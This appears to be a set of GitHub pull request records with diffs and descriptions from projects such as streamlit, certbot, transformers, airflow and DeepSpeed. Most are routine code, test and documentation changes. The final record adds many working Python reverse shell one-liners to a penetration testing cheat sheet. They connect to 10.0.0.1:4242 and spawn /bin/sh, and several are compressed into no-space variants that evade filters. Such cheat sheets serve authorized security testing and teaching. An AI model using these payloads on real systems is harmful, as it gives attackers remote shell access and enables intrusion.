+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+import streamlit as st
+
+
+@st.cache(allow_output_mutation=True)
+def rerun_record():
+ return [0]
+
+
+count = rerun_record()
+count[0] += 1
+
+if count[0] < 4:
+ st.experimental_rerun()
+
+if count[0] >= 4:
+ st.text("Being able to rerun a session is awesome!")
diff --git a/e2e/specs/st_experimental_rerun.spec.ts b/e2e/specs/st_experimental_rerun.spec.ts
new file mode 100644
index 000000000000..5b8fdfa5b206
--- /dev/null
+++ b/e2e/specs/st_experimental_rerun.spec.ts
@@ -0,0 +1,31 @@
+/**
+ * @license
+ * Copyright 2018-2020 Streamlit Inc.
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+/// <reference types="cypress" />
+
+describe("st.experimental_rerun", () => {
+ before(() => {
+ cy.visit("http://localhost:3000/");
+ });
+
+ it("restarts the session when invoked", () => {
+ cy.get(".element-container .stText").should(
+ "contain",
+ "Being able to rerun a session is awesome!"
+ );
+ });
+});
diff --git a/lib/streamlit/__init__.py b/lib/streamlit/__init__.py
index d60c766f37ed..cdcf7797bc92 100644
--- a/lib/streamlit/__init__.py
+++ b/lib/streamlit/__init__.py
@@ -76,6 +76,8 @@
from streamlit.report_thread import add_report_ctx as _add_report_ctx
from streamlit.report_thread import get_report_ctx as _get_report_ctx
from streamlit.script_runner import StopException
+from streamlit.script_runner import RerunException as _RerunException
+from streamlit.script_request_queue import RerunData as _RerunData
from streamlit.errors import StreamlitAPIException
from streamlit.proto import BlockPath_pb2 as _BlockPath_pb2
from streamlit.proto import ForwardMsg_pb2 as _ForwardMsg_pb2
@@ -507,3 +509,17 @@ def stop():
"""
raise StopException()
+
+
+def experimental_rerun():
+ """Rerun the script immediately.
+
+ When `st.experimental_rerun()` is called, the script is halted - no
+ more statements will be run, and the script will be queued to re-run
+ from the top.
+
+ If this function is called outside of Streamlit, it will raise an
+ Exception.
+ """
+
+ raise _RerunException(_RerunData(None))
diff --git a/scripts/run_bare_integration_tests.py b/scripts/run_bare_integration_tests.py
index abb0d95394e2..df267e7515ba 100755
--- a/scripts/run_bare_integration_tests.py
+++ b/scripts/run_bare_integration_tests.py
@@ -36,6 +36,10 @@
EXCLUDED_FILENAMES = set() # type: Set[str]
+# st_experimental_rerun.py calls st.experimental_rerun which raises a
+# RerunException when called within plain Python.
+EXCLUDED_FILENAMES.add("st_experimental_rerun.py")
+
# Since there is not DISPLAY set (and since Streamlit is not actually running
# and fixing Matplotlib in these tests), we set the MPL backend to something
# that doesn't require a display.
| **Issue:**
Fixes https://github.com/streamlit/streamlit/issues/653
**Description:**
Added `st.experimental_rerun` and `st.experimental_get_session_id`. Given that rerun needed access to the server I chose to make the relevant test be within the e2e testing suite. This e2e test undergoes a few reruns within a thread, and then a couple more just within the main streamlit instance. | https://api.github.com/repos/streamlit/streamlit/pulls/2060 | 2020-09-29T13:00:50Z | 2020-10-13T22:00:32Z | 2020-10-13T22:00:32Z | 2021-07-24T00:36:45Z | 1,137 | streamlit/streamlit | 21,963 |
Bypass Lexicon subdomain resolution in Lexicon-based DNS plugins | diff --git a/certbot/certbot/plugins/dns_common_lexicon.py b/certbot/certbot/plugins/dns_common_lexicon.py
index 6e07e6dc4c7..be94e191baf 100644
--- a/certbot/certbot/plugins/dns_common_lexicon.py
+++ b/certbot/certbot/plugins/dns_common_lexicon.py
@@ -198,6 +198,10 @@ def _build_lexicon_config(self, domain: str) -> ConfigResolver:
dict_config = {
'domain': domain,
+ # We bypass Lexicon subdomain resolution by setting the 'delegated' field in the config
+ # to the value of the 'domain' field itself. Here we consider that the domain passed to
+ # _build_lexicon_config() is already the exact subdomain of the actual DNS zone to use.
+ 'delegated': domain,
'provider_name': self._provider_name,
'ttl': self._ttl,
self._provider_name: {item[2]: self._credentials.conf(item[0])
| As always, brittle code breaks first.
The Lexicon-based DNS plugins use a mechanism to determine which segment of the input domain is actually the DNS zone in which the DNS-01 challenge has to be initiated (eg. `subdomain.domain.com` or `domain.com` for input `subdomain.domain.com`): it recursively tries to configure Lexicon and initiate authentication from the most specific to the most generic domain segment, and selects the first segment where Lexicon stops erroring out. A sketch of that loop follows.
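A minimal illustration of the described discovery loop (simplified pseudocode; `try_authenticate` is a hypothetical hook, not a Certbot API):

```python
def find_zone(domain, try_authenticate):
    """Walk from the most specific segment to the registered domain and return
    the first one the provider accepts; raises if none works."""
    labels = domain.split(".")
    for i in range(len(labels) - 1):  # 'sub.domain.com', then 'domain.com'
        candidate = ".".join(labels[i:])
        try:
            try_authenticate(candidate)  # hypothetical hook: raises on failure
            return candidate
        except Exception:
            continue
    raise RuntimeError(f"no usable DNS zone found for {domain}")
```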
This mechanism broke with #9746 because the plugins now call the Lexicon client instead of the underlying providers, and the client makes its own guess about the actual domain requested. Typically for `subdomain.domain.com` it will try to authenticate against `domain.com`, and so the mechanism above does not work anymore.
This PR fixes the issue by using the `delegated` field in Lexicon config each time the plugin needs it. This field is designed for this kind of purpose: it will instruct Lexicon what is the actual DNS zone domain instead of guessing it.
I tested the change with one of my OVH accounts. The expected behavior is re-established and the plugin is able to test `subdomain.domain.com` then `domain.com` as before.
Fixes #9791
Fixes #9818 | https://api.github.com/repos/certbot/certbot/pulls/9821 | 2023-10-27T08:12:18Z | 2023-10-27T17:04:41Z | 2023-10-27T17:04:40Z | 2023-10-27T17:04:41Z | 240 | certbot/certbot | 3,575 |
Support OpenAI's new models. | diff --git a/interpreter/terminal_interface/start_terminal_interface.py b/interpreter/terminal_interface/start_terminal_interface.py
index 00471c931..a7f53e95f 100644
--- a/interpreter/terminal_interface/start_terminal_interface.py
+++ b/interpreter/terminal_interface/start_terminal_interface.py
@@ -357,15 +357,15 @@ def start_terminal_interface(interpreter):
### Set some helpful settings we know are likely to be true
- if interpreter.llm.model == "gpt-4-1106-preview":
+ if interpreter.llm.model.startswith("gpt-4") or interpreter.llm.model.startswith("openai/gpt-4"):
if interpreter.llm.context_window is None:
interpreter.llm.context_window = 128000
if interpreter.llm.max_tokens is None:
interpreter.llm.max_tokens = 4096
if interpreter.llm.supports_functions is None:
- interpreter.llm.supports_functions = True
+ interpreter.llm.supports_functions = False if "vision" in interpreter.llm.model else True
- if interpreter.llm.model == "gpt-3.5-turbo-1106":
+ if interpreter.llm.model.startswith("gpt-3.5-turbo") or interpreter.llm.model.startswith("openai/gpt-3.5-turbo"):
if interpreter.llm.context_window is None:
interpreter.llm.context_window = 16000
if interpreter.llm.max_tokens is None:
| ### Describe the changes you have made:
Add default context window and max tokens configs for OpenAI's new models: `gpt-4-turbo-preview`, `gpt-4-0125-preview`, and `gpt-4-1106-vision-preview`.
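A minimal sketch of the prefix matching the diff relies on (illustrative only, not the shipped code):

```python
def gpt4_defaults(model, context_window=None, max_tokens=None, supports_functions=None):
    """Illustrative mirror of the diff's prefix checks (not the shipped code)."""
    if model.startswith("gpt-4") or model.startswith("openai/gpt-4"):
        context_window = 128000 if context_window is None else context_window
        max_tokens = 4096 if max_tokens is None else max_tokens
        if supports_functions is None:
            supports_functions = "vision" not in model
    return context_window, max_tokens, supports_functions

print(gpt4_defaults("gpt-4-0125-preview"))  # (128000, 4096, True)
```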
### Reference any relevant issues (e.g. "Fixes #000"):
If we can keep these configs updated for as many models as possible, we can maybe avoid issues like #915
### Pre-Submission Checklist (optional but appreciated):
- [x] I have included relevant documentation updates (stored in /docs)
- [x] I have read `docs/CONTRIBUTING.md`
- [x] I have read `docs/ROADMAP.md`
### OS Tests (optional but appreciated):
- [x] Tested on Windows
- [x] Tested on MacOS
- [x] Tested on Linux
| https://api.github.com/repos/OpenInterpreter/open-interpreter/pulls/1099 | 2024-03-19T07:05:22Z | 2024-03-24T07:49:41Z | 2024-03-24T07:49:41Z | 2024-03-24T07:53:04Z | 322 | OpenInterpreter/open-interpreter | 40,915 |
Add wav2letter | diff --git a/README.md b/README.md
index 358458b3..7ac4b5b6 100644
--- a/README.md
+++ b/README.md
@@ -614,6 +614,7 @@ Further resources:
* [sfm](https://github.com/marcoscoffier/lua---sfm) - A bundle adjustment/structure from motion package.
* [fex](https://github.com/koraykv/fex) - A package for feature extraction in Torch. Provides SIFT and dSIFT modules.
* [OverFeat](https://github.com/sermanet/OverFeat) - A state-of-the-art generic dense feature extractor.
+ * [wav2letter](https://github.com/facebookresearch/wav2letter) - a simple and efficient end-to-end Automatic Speech Recognition (ASR) system from Facebook AI Research.
* [Numeric Lua](http://numlua.luaforge.net/)
* [Lunatic Python](http://labix.org/lunatic-python)
* [SciLua](http://scilua.org/)
| https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/464 | 2018-01-01T21:01:34Z | 2018-01-08T21:12:48Z | 2018-01-08T21:12:48Z | 2020-10-02T09:30:54Z | 234 | josephmisiti/awesome-machine-learning | 52,532 |
|
[extensions/openai] Support undocumented base64 'encoding_format' param for compatibility with official OpenAI client | diff --git a/extensions/openai/script.py b/extensions/openai/script.py
index c168ec95b0..9eb35a4648 100644
--- a/extensions/openai/script.py
+++ b/extensions/openai/script.py
@@ -1,4 +1,6 @@
+import base64
import json
+import numpy as np
import os
import time
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
@@ -45,6 +47,20 @@ def clamp(value, minvalue, maxvalue):
return max(minvalue, min(value, maxvalue))
+def float_list_to_base64(float_list):
+ # Convert the list to a float32 array that the OpenAPI client expects
+ float_array = np.array(float_list, dtype="float32")
+
+ # Get raw bytes
+ bytes_array = float_array.tobytes()
+
+ # Encode bytes into base64
+ encoded_bytes = base64.b64encode(bytes_array)
+
+ # Turn raw base64 encoded bytes into ASCII
+ ascii_string = encoded_bytes.decode('ascii')
+ return ascii_string
+
class Handler(BaseHTTPRequestHandler):
def do_GET(self):
if self.path.startswith('/v1/models'):
@@ -435,7 +451,13 @@ def do_POST(self):
embeddings = embedding_model.encode(input).tolist()
- data = [{"object": "embedding", "embedding": emb, "index": n} for n, emb in enumerate(embeddings)]
+ def enc_emb(emb):
+ # If base64 is specified, encode. Otherwise, do nothing.
+ if body.get("encoding_format", "") == "base64":
+ return float_list_to_base64(emb)
+ else:
+ return emb
+ data = [{"object": "embedding", "embedding": enc_emb(emb), "index": n} for n, emb in enumerate(embeddings)]
response = json.dumps({
"object": "list",
| The official Python OpenAI API client uses an undocumented `encoding_format` parameter on the `/v1/embeddings` endpoint by default.
https://github.com/openai/openai-python/blob/d6fa3bfaae69d639b0dd2e9251b375d7070bbef1/openai/api_resources/embedding.py#L25-L29
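For reference, decoding on the client side is the mirror image of the `float_list_to_base64` helper in the diff above; a minimal sketch (the dtype must stay `float32` to match the server side):
```python
import base64

import numpy as np

def base64_to_float_list(ascii_string: str) -> list:
    # Undo the ASCII and base64 layers, then reinterpret the raw
    # bytes as the float32 values the server serialized.
    raw_bytes = base64.b64decode(ascii_string.encode("ascii"))
    return np.frombuffer(raw_bytes, dtype="float32").tolist()
```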
This PR adds support for the `encoding_format` parameter to maintain support as a drop-in replacement for the OpenAI API. Without this parameter, [llama_index](https://github.com/jerryjliu/llama_index), and possibly other langchain apps, may fail to work. | https://api.github.com/repos/oobabooga/text-generation-webui/pulls/1876 | 2023-05-07T05:06:30Z | 2023-05-09T01:31:34Z | 2023-05-09T01:31:34Z | 2023-05-09T01:31:35Z | 426 | oobabooga/text-generation-webui | 26,349 |
Update README.md. There is "of" twice. | diff --git a/README.md b/README.md
index 03353b3fc..1f19580f2 100644
--- a/README.md
+++ b/README.md
@@ -92,7 +92,7 @@
- A common language (for the two ends to understand)
- A way to address who do you want to communicate with
- - A Connection (so the content of of the communication can reach the recipients)
+ - A Connection (so the content of the communication can reach the recipients)
</b></details>
<details>
| Update README.md to fix a minor mistake: the word "of" appeared twice. | https://api.github.com/repos/bregman-arie/devops-exercises/pulls/284 | 2022-09-07T00:13:08Z | 2022-09-07T01:32:14Z | 2022-09-07T01:32:14Z | 2022-09-07T01:32:14Z | 125 | bregman-arie/devops-exercises | 17,672 |
Deal with multiple choice in common tests | diff --git a/tests/test_modeling_bert.py b/tests/test_modeling_bert.py
index 276ed056c7d24..ed42031232bd2 100644
--- a/tests/test_modeling_bert.py
+++ b/tests/test_modeling_bert.py
@@ -407,6 +407,7 @@ class BertModelTest(ModelTesterMixin, unittest.TestCase):
(
BertModel,
BertForMaskedLM,
+ BertForMultipleChoice,
BertForNextSentencePrediction,
BertForPreTraining,
BertForQuestionAnswering,
diff --git a/tests/test_modeling_common.py b/tests/test_modeling_common.py
index ceca9d43eae52..ccbbf145f4d32 100644
--- a/tests/test_modeling_common.py
+++ b/tests/test_modeling_common.py
@@ -37,6 +37,7 @@
BertModel,
BertConfig,
BERT_PRETRAINED_MODEL_ARCHIVE_LIST,
+ MODEL_FOR_MULTIPLE_CHOICE_MAPPING,
top_k_top_p_filtering,
)
@@ -62,6 +63,14 @@ class ModelTesterMixin:
test_missing_keys = True
is_encoder_decoder = False
+ def _prepare_for_class(self, inputs_dict, model_class):
+ if model_class in MODEL_FOR_MULTIPLE_CHOICE_MAPPING.values():
+ return {
+ k: v.unsqueeze(1).expand(-1, self.model_tester.num_choices, -1).contiguous()
+ for k, v in inputs_dict.items()
+ }
+ return inputs_dict
+
def test_save_load(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
@@ -70,7 +79,7 @@ def test_save_load(self):
model.to(torch_device)
model.eval()
with torch.no_grad():
- outputs = model(**inputs_dict)
+ outputs = model(**self._prepare_for_class(inputs_dict, model_class))
out_2 = outputs[0].cpu().numpy()
out_2[np.isnan(out_2)] = 0
@@ -79,7 +88,7 @@ def test_save_load(self):
model = model_class.from_pretrained(tmpdirname)
model.to(torch_device)
with torch.no_grad():
- after_outputs = model(**inputs_dict)
+ after_outputs = model(**self._prepare_for_class(inputs_dict, model_class))
# Make sure we don't have nans
out_1 = after_outputs[0].cpu().numpy()
@@ -109,8 +118,8 @@ def test_determinism(self):
model.to(torch_device)
model.eval()
with torch.no_grad():
- first = model(**inputs_dict)[0]
- second = model(**inputs_dict)[0]
+ first = model(**self._prepare_for_class(inputs_dict, model_class))[0]
+ second = model(**self._prepare_for_class(inputs_dict, model_class))[0]
out_1 = first.cpu().numpy()
out_2 = second.cpu().numpy()
out_1 = out_1[~np.isnan(out_1)]
@@ -136,7 +145,7 @@ def test_attention_outputs(self):
model.to(torch_device)
model.eval()
with torch.no_grad():
- outputs = model(**inputs_dict)
+ outputs = model(**self._prepare_for_class(inputs_dict, model_class))
attentions = outputs[-1]
self.assertEqual(model.config.output_attentions, True)
self.assertEqual(model.config.output_hidden_states, False)
@@ -178,7 +187,7 @@ def test_attention_outputs(self):
model.to(torch_device)
model.eval()
with torch.no_grad():
- outputs = model(**inputs_dict)
+ outputs = model(**self._prepare_for_class(inputs_dict, model_class))
self.assertEqual(out_len + (2 if self.is_encoder_decoder else 1), len(outputs))
self.assertEqual(model.config.output_attentions, True)
self.assertEqual(model.config.output_hidden_states, True)
@@ -223,7 +232,7 @@ def _create_and_check_torchscript(self, config, inputs_dict):
model = model_class(config=configs_no_init)
model.to(torch_device)
model.eval()
- inputs = inputs_dict["input_ids"] # Let's keep only input_ids
+ inputs = self._prepare_for_class(inputs_dict, model_class)["input_ids"] # Let's keep only input_ids
try:
traced_gpt2 = torch.jit.trace(model, inputs)
@@ -286,7 +295,7 @@ def test_headmasking(self):
head_mask[0, 0] = 0
head_mask[-1, :-1] = 0
head_mask.requires_grad_(requires_grad=True)
- inputs = inputs_dict.copy()
+ inputs = self._prepare_for_class(inputs_dict, model_class).copy()
inputs["head_mask"] = head_mask
outputs = model(**inputs)
@@ -337,7 +346,7 @@ def test_head_pruning(self):
}
model.prune_heads(heads_to_prune)
with torch.no_grad():
- outputs = model(**inputs_dict)
+ outputs = model(**self._prepare_for_class(inputs_dict, model_class))
attentions = outputs[-1]
@@ -372,7 +381,7 @@ def test_head_pruning_save_load_from_pretrained(self):
model.to(torch_device)
with torch.no_grad():
- outputs = model(**inputs_dict)
+ outputs = model(**self._prepare_for_class(inputs_dict, model_class))
attentions = outputs[-1]
self.assertEqual(attentions[0].shape[-3], 1)
self.assertEqual(attentions[1].shape[-3], self.model_tester.num_attention_heads)
@@ -402,7 +411,7 @@ def test_head_pruning_save_load_from_config_init(self):
model.eval()
with torch.no_grad():
- outputs = model(**inputs_dict)
+ outputs = model(**self._prepare_for_class(inputs_dict, model_class))
attentions = outputs[-1]
self.assertEqual(attentions[0].shape[-3], 1)
@@ -430,7 +439,7 @@ def test_head_pruning_integration(self):
model.eval()
with torch.no_grad():
- outputs = model(**inputs_dict)
+ outputs = model(**self._prepare_for_class(inputs_dict, model_class))
attentions = outputs[-1]
self.assertEqual(attentions[0].shape[-3], self.model_tester.num_attention_heads - 1)
@@ -444,7 +453,7 @@ def test_head_pruning_integration(self):
model.to(torch_device)
with torch.no_grad():
- outputs = model(**inputs_dict)
+ outputs = model(**self._prepare_for_class(inputs_dict, model_class))
attentions = outputs[-1]
self.assertEqual(attentions[0].shape[-3], self.model_tester.num_attention_heads - 1)
@@ -456,7 +465,7 @@ def test_head_pruning_integration(self):
model.prune_heads(heads_to_prune)
with torch.no_grad():
- outputs = model(**inputs_dict)
+ outputs = model(**self._prepare_for_class(inputs_dict, model_class))
attentions = outputs[-1]
self.assertEqual(attentions[0].shape[-3], self.model_tester.num_attention_heads - 1)
@@ -476,7 +485,7 @@ def test_hidden_states_output(self):
model.to(torch_device)
model.eval()
with torch.no_grad():
- outputs = model(**inputs_dict)
+ outputs = model(**self._prepare_for_class(inputs_dict, model_class))
hidden_states = outputs[-1]
self.assertEqual(model.config.output_attentions, False)
self.assertEqual(model.config.output_hidden_states, True)
@@ -517,7 +526,7 @@ def test_resize_tokens_embeddings(self):
# Check that it actually resizes the embeddings matrix
self.assertEqual(model_embed.weight.shape[0], cloned_embeddings.shape[0] + 10)
# Check that the model can still do a forward pass successfully (every parameter should be resized)
- model(**inputs_dict)
+ model(**self._prepare_for_class(inputs_dict, model_class))
# Check that resizing the token embeddings with a smaller vocab size decreases the model's vocab size
model_embed = model.resize_token_embeddings(model_vocab_size - 15)
@@ -528,7 +537,7 @@ def test_resize_tokens_embeddings(self):
# Check that the model can still do a forward pass successfully (every parameter should be resized)
# Input ids should be clamped to the maximum size of the vocabulary
inputs_dict["input_ids"].clamp_(max=model_vocab_size - 15 - 1)
- model(**inputs_dict)
+ model(**self._prepare_for_class(inputs_dict, model_class))
# Check that adding and removing tokens has not modified the first part of the embedding matrix.
models_equal = True
@@ -631,6 +640,8 @@ def test_inputs_embeds(self):
inputs_dict.pop("decoder_input_ids", None)
for model_class in self.all_model_classes:
+ if model_class in MODEL_FOR_MULTIPLE_CHOICE_MAPPING.values():
+ continue
model = model_class(config)
model.to(torch_device)
model.eval()
It's a bit heavy, but I didn't find another way to reshape the inputs when needed for the multiple choice model. With this, and by skipping the input_embeds test when the model is a multiple choice one (the current implementation requires `input_ids`), I managed to get the common tests passing for `BertForMultipleChoice`.
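For intuition, the reshape that `_prepare_for_class` applies just duplicates each feature tensor across a new choice dimension; a standalone sketch with made-up shapes:
```python
import torch

batch_size, num_choices, seq_len = 2, 4, 7
input_ids = torch.randint(0, 100, (batch_size, seq_len))

# (batch, seq_len) -> (batch, num_choices, seq_len): every choice sees the
# same tokens, which is enough for the shape checks in the common tests.
expanded = input_ids.unsqueeze(1).expand(-1, num_choices, -1).contiguous()
print(expanded.shape)  # torch.Size([2, 4, 7])
```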
Let me know if you have other ideas! | https://api.github.com/repos/huggingface/transformers/pulls/4886 | 2020-06-09T21:43:22Z | 2020-06-10T12:10:21Z | 2020-06-10T12:10:21Z | 2020-07-19T04:06:44Z | 2,004 | huggingface/transformers | 12,136 |
Fix and enable test_retry_handling_job | diff --git a/tests/jobs/test_scheduler_job.py b/tests/jobs/test_scheduler_job.py
index 5e602c8f10b88..b2bbe34457789 100644
--- a/tests/jobs/test_scheduler_job.py
+++ b/tests/jobs/test_scheduler_job.py
@@ -3037,7 +3037,6 @@ def run_with_error(ti, ignore_ti_state=False):
ti.refresh_from_db()
assert ti.state == State.SUCCESS
- @pytest.mark.skip(reason="This test needs fixing. It's very wrong now and always fails")
def test_retry_handling_job(self):
"""
Integration test of the scheduler not accidentally resetting
@@ -3046,9 +3045,11 @@ def test_retry_handling_job(self):
dag = self.dagbag.get_dag("test_retry_handling_job")
dag_task1 = dag.get_task("test_retry_handling_op")
dag.clear()
+ dag.sync_to_db()
- scheduler_job = Job(jobe_type=SchedulerJobRunner.job_type, heartrate=0)
- self.job_runner = SchedulerJobRunner(job=scheduler_job, dag_id=dag.dag_id, num_runs=1)
+ scheduler_job = Job(job_type=SchedulerJobRunner.job_type, heartrate=0)
+ self.job_runner = SchedulerJobRunner(job=scheduler_job, num_runs=1)
+ self.job_runner.processor_agent = mock.MagicMock()
run_job(scheduler_job, execute_callable=self.job_runner._execute)
session = settings.Session()
Needed to re-sync the DAG to the DB as the only DAG so that the scheduler schedules it with num_runs=1.
| https://api.github.com/repos/apache/airflow/pulls/34326 | 2023-09-13T07:12:31Z | 2023-09-14T10:03:46Z | 2023-09-14T10:03:46Z | 2023-10-29T21:52:28Z | 326 | apache/airflow | 14,760 |
MoE read the docs update | diff --git a/deepspeed/moe/layer.py b/deepspeed/moe/layer.py
index 6bc4c782cfc8..a0fb5989d00e 100644
--- a/deepspeed/moe/layer.py
+++ b/deepspeed/moe/layer.py
@@ -16,9 +16,6 @@
class MoE(torch.nn.Module):
- '''
- DeepSpeed MOE API: This defines a simple API that can be used from client-side code.
- '''
def __init__(self,
hidden_size,
expert,
@@ -30,10 +27,9 @@ def __init__(self,
min_capacity=4,
noisy_gate_policy: typing.Optional[str] = None):
"""Initialize an MoE layer.
- TODO: add details about input/output dimension assumptions
Arguments:
- hidden_size (int): the hidden dimension of the model.
+ hidden_size (int): the hidden dimension of the model, importantly this is also the input and output dimension.
expert (torch.nn.Module): the torch module that defines the expert (e.g., MLP, torch.linear).
@@ -81,15 +77,20 @@ def __init__(self,
self.dropout = torch.nn.Dropout(output_dropout_prob)
def forward(self, hidden_states, used_token=None):
- """
+ """ MoE forward
+
Arguments:
hidden_states (Tensor): input to the layer
used_token (Tensor, optional): default: None, mask only used tokens
Returns:
- output (Tensor): output of the model
- l_aux (Tensor): gate loss value
- exp_counts (int): expert count
+ A tuple including output, gate loss, and expert count.
+
+ * output (Tensor): output of the model
+
+ * l_aux (Tensor): gate loss value
+
+ * exp_counts (int): expert count
"""
output = self.deepspeed_moe(hidden_states, used_token)
output = self.dropout(output)
diff --git a/deepspeed/utils/groups.py b/deepspeed/utils/groups.py
index 2b1836cac889..dcd774d76501 100644
--- a/deepspeed/utils/groups.py
+++ b/deepspeed/utils/groups.py
@@ -69,10 +69,39 @@ def ensure_divisibility(numerator, denominator):
def initialize(ep_size=1, mpu=None):
- """ if mpu is provided, intialize groups using mpu.
- otherwise, we have two cases:
- 1. If called from DeepSpeed.initialize(), initialize groups with mp_size=1 and ep_size=1
- 2. If called from an application, initialize groups with mp_size=1 and ep_size=ep_size provided by the application
+ """
+ Process groups initialization supporting expert (E), data (D), and model (M) parallelism. DeepSpeed considers
+ the following scenarios w.r.t. process group creation.
+
+ * S1: There is no expert parallelism or model parallelism, only data (D)::
+
+ model = my_model(args)
+ engine = deepspeed.initialize(model) # initialize groups without mpu
+
+ * S2: There is expert parallelism but no model parallelism (E+D)::
+
+ deepspeed.utils.groups.initialize(ep_size) # groups will be initialized here
+ model = my_model(args)
+ engine = deepspeed.initialize(model)
+
+ * S3: There is model parallelism but no expert parallelism (M)::
+
+ mpu.init() # client initializes its model parallel unit
+ model = my_model(args)
+ engine = deepspeed.initialize(model, mpu=mpu) # init w. mpu but ep_size = dp_world_size
+
+ * S4: There is model, data, and expert parallelism (E+D+M)::
+
+ mpu.init() # client initializes its model parallel unit
+ deepspeed.utils.groups.initialize(ep_size, mpu) # initialize expert groups wrt mpu
+ model = my_model(args)
+ engine = deepspeed.initialize(model, mpu=mpu) # passing mpu is optional in this case
+
+ Arguments:
+ ep_size (int, optional): default=1, expert parallel size
+ mpu (module, optional): default=None, model parallel unit (e.g., from Megatron)
+ that describes model/data parallel ranks.
+
"""
if mpu is not None:
log_dist(message="initializing deepspeed groups using mpu", ranks=[0])
diff --git a/docs/code-docs/source/index.rst b/docs/code-docs/source/index.rst
index 5175209cc1c4..7f5cd738acc6 100644
--- a/docs/code-docs/source/index.rst
+++ b/docs/code-docs/source/index.rst
@@ -42,7 +42,12 @@ ZeRO API
zero3
+Mixture of Experts (MoE)
+------------------------
+.. toctree::
+ :maxdepth: 2
+ moe
Transformer Kernel API
----------------------
diff --git a/docs/code-docs/source/moe.rst b/docs/code-docs/source/moe.rst
new file mode 100644
index 000000000000..21228c444b20
--- /dev/null
+++ b/docs/code-docs/source/moe.rst
@@ -0,0 +1,12 @@
+Mixture of Experts (MoE)
+========================
+
+Layer specification
+--------------------
+.. autoclass:: deepspeed.moe.layer.MoE
+ :members:
+
+
+Groups initialization
+---------------------
+.. autofunction:: deepspeed.utils.groups.initialize
| https://api.github.com/repos/microsoft/DeepSpeed/pulls/1312 | 2021-08-17T17:49:42Z | 2021-08-17T17:50:08Z | 2021-08-17T17:50:08Z | 2021-10-27T17:29:08Z | 1,263 | microsoft/DeepSpeed | 10,260 |
|
New/Updated Python Linux Reverse Shells | diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index 108e70a16d..4dc4f2a58c 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md
@@ -95,19 +95,62 @@ IPv4
```python
export RHOST="10.0.0.1";export RPORT=4242;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
```
+```python
+python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
+```
+```python
+python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
+```
+```python
+python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'
+```
-IPv4
+IPv4 (No Spaces)
+```python
+python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
+```
+```python
+python -c 'socket=__import__("socket");subprocess=__import__("subprocess");os=__import__("os");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
+```
+```python
+python -c 'socket=__import__("socket");subprocess=__import__("subprocess");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'
+```
+
+IPv4 (No Spaces, Shortened)
```python
-python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
+python -c 'a=__import__;s=a("socket");o=a("os").dup2;p=a("pty").spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect(("10.0.0.1",4242));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
+```
+```python
+python -c 'a=__import__;b=a("socket");p=a("subprocess").call;o=a("os").dup2;s=b.socket(b.AF_INET,b.SOCK_STREAM);s.connect(("10.0.0.1",4242));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p(["/bin/sh","-i"])'
+```
+```python
+python -c 'a=__import__;b=a("socket");c=a("subprocess").call;s=b.socket(b.AF_INET,b.SOCK_STREAM);s.connect(("10.0.0.1",4242));f=s.fileno;c(["/bin/sh","-i"],stdin=f(),stdout=f(),stderr=f())'
+```
+
+IPv4 (No Spaces, Shortened Further)
+```python
+python -c 'a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("10.0.0.1",4242));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
+```
+```python
+python -c 'a=__import__;b=a("socket").socket;p=a("subprocess").call;o=a("os").dup2;s=b();s.connect(("10.0.0.1",4242));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p(["/bin/sh","-i"])'
